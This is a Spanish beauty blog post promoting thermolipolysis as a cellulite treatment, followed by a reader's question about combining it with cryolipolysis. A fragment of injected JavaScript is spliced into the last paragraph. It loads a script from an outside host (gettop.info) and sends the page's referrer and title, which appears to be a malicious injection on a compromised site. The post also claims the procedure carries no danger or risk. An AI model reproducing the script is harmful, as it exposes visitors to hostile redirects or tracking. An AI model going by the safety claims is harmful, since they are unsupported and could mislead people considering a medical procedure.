Salud y belleza » Belleza

La batalla de la Termolipólisis

1 Comentario

La batalla de las Termópilas fue un conocido enfrentamiento bélico que tuvo lugar  allá por el 400 A.C. -durante la Segunda Guerra Médica- entre persas y espartanos. Una comparación entre esa lucha y la que hoy nos compete –la de la Termolipólisis- sería imposible: más tiempo, dinero y recursos se lleva gastada en ésta que en aquella.

Más allá de la broma a partir del efecto de cuasi-paronimia, la Termolipólisis es un sistema anti celulitis que utilizan las mujeres para pelear la guerra contra la celulitis -ese enemigo de siempre- y en la actualidad cada vez brinda mejores resultados.

Dicho tratamiento comenzó a ser practicado en Alemania y, gracias a su éxito comprobado, logró difundirse posteriormente hacia diferentes partes de Europa hasta llegar a España.

La Termolipólisis se basa en la degradación de las grasas (triglicéridos), almacenados en los tejidos adipositos o células grasas, por medio de un aumento de la temperatura local. Como vemos, el sistema es bastante sofisticado y para practicar una intervención de ese tipo se necesita no solo de grandes herramientas (ante todo un generador de calor que aumenta el metabolismo) sino también otros requisitos.

Este tratamiento se realiza en sesiones de no más de una hora de duración: en ese lapso se colocan mantas de termodifusión sobre las áreas a tratar y se intenta llevar a cabo ese proceso de calor necesario para deshacer las imperfecciones.

El sistema de Termolipólisis no presenta efectos peligrosos ni tampoco genera algún tipo de riesgo para el físico de la mujer intervenido: solo consume constancia.

Los primeros resultados pueden verse fácilmente luego de un par de sesiones pero, para lograr quitar el problema entero, se necesita un mínimo de sesiones. De otra manera no se consigue proyectar el efecto lipolítico y no se alcanza a efectuar la eliminación de esa adiposidad completa.

Vale destacar que este tratamiento genera otros efectos positivos sobre el organismo: la acción, en sí misma, es revitalizante y regeneradora. Mediante el calor se incrementa, además, el aporte de nutrientes sobre los tejidos y se activa la circulación de la sangre. Como si fuera poco, la Termolipólisis retarda el crecimiento del vello (…aquí viene la buena).

Para que el sistema sea realmente perfecto, el paciente debe acompañar las sesiones con una serie de hábitos específicos (…aquí viene la mala). Los requisitos principales abarcan la práctica de una buena dieta, el consumo de muchos líquidos y el ejercicio regular.

En fin, la Termolipólisis se alza como un nuevo y moderna sistema para tener muy en cuenta a la hora de esa batalla contra la celulitis: de las más largas de la historia.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {

Más consejos de salud y belleza : , , ,

One Comment »

  • laura chaves said:

    buenos dias!

    Mi nombre es Laura Chaves, les escribo de Costa Rica para consultarles una duda…

    se puede combinar un tratamiento de termolipolisis e inmediatamente despues uno de criolipolisis a un mismo cliente?? tomando en cuanta el calor que produce la termo con el congelamiento que produce la criolipolisis, esto puede producir quemaduras en la piel???

    mil gracias de antemano por su colaboracion y ayuda en este tema

    saludos

    Laura

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.